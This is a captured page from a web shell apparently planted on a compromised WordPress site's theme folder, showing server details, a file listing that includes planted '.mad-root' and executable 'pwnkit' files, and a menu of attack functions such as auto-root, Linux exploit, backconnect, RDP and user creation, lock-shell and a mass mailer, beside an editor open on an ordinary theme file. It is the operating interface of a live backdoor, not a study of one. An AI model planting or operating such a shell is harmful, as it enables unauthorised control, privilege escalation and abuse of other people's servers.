Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.101
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
inspiro /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
dynamic-css
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin-notice.php
4.72
KB
-rw-r--r--
back-compat.php
2.27
KB
-rw-r--r--
color-patterns.php
723
B
-rw-r--r--
common-functions.php
18.44
KB
-rw-r--r--
custom-header.php
18.26
KB
-rw-r--r--
customizer-functions.php
4.96
KB
-rw-r--r--
editor-fonts.php
2.53
KB
-rw-r--r--
google-fonts.php
186.01
KB
-rw-r--r--
icon-functions.php
2.41
KB
-rw-r--r--
marketing-functions.php
9.95
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
shortcodes.php
938
B
-rw-r--r--
starter-content.php
125.28
KB
-rw-r--r--
template-functions.php
7.5
KB
-rw-r--r--
template-tags.php
7.29
KB
-rw-r--r--
theme-media.php
2.4
KB
-rw-r--r--
wc-custom-functions.php
456
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : icon-functions.php
<?php /** * Inspiro Lite SVG Icon helper functions * * @package Inspiro * @subpackage Inspiro_Lite * @since Inspiro 1.0.0 */ if ( ! function_exists( 'inspiro_the_theme_svg' ) ) { /** * Output and Get Theme SVG. * Output and get the SVG markup for an icon in the Inspiro_SVG_Icons class. * * @param string $svg_name The name of the icon. * @param string $group The group the icon belongs to. * @param string $color Color code. */ function inspiro_the_theme_svg( $svg_name, $group = 'ui', $color = '' ) { echo inspiro_get_theme_svg( $svg_name, $group, $color ); } } if ( ! function_exists( 'inspiro_get_theme_svg' ) ) { /** * Get information about the SVG icon. * * @param string $svg_name The name of the icon. * @param string $group The group the icon belongs to. * @param string $color Color code. */ function inspiro_get_theme_svg( $svg_name, $group = 'ui', $color = '' ) { // Make sure that only our allowed tags and attributes are included. $svg = wp_kses( Inspiro_SVG_Icons::get_svg( $svg_name, $group, $color ), array( 'svg' => array( 'class' => true, 'xmlns' => true, 'width' => true, 'height' => true, 'viewbox' => true, 'aria-hidden' => true, 'role' => true, 'focusable' => true, ), 'path' => array( 'fill' => true, 'fill-rule' => true, 'd' => true, 'transform' => true, ), 'polygon' => array( 'fill' => true, 'fill-rule' => true, 'points' => true, 'transform' => true, 'focusable' => true, ), ) ); if ( ! $svg ) { return false; } return $svg; } } /** * Add dropdown icon if menu item has children. * * @param string $title The menu item's title. * @param WP_Post $item The current menu item. * @param stdClass $args An object of wp_nav_menu() arguments. * @param int $depth Depth of menu item. Used for padding. * @return string The menu item's title with dropdown icon. */ function inspiro_dropdown_icon_to_menu_link( $title, $item, $args, $depth ) { if ( 'primary' === $args->theme_location ) { foreach ( $item->classes as $value ) { if ( 'menu-item-has-children' === $value || 'page_item_has_children' === $value ) { $title = $title . inspiro_get_theme_svg( 'angle-down' ); } } } return $title; } add_filter( 'nav_menu_item_title', 'inspiro_dropdown_icon_to_menu_link', 10, 4 );
Close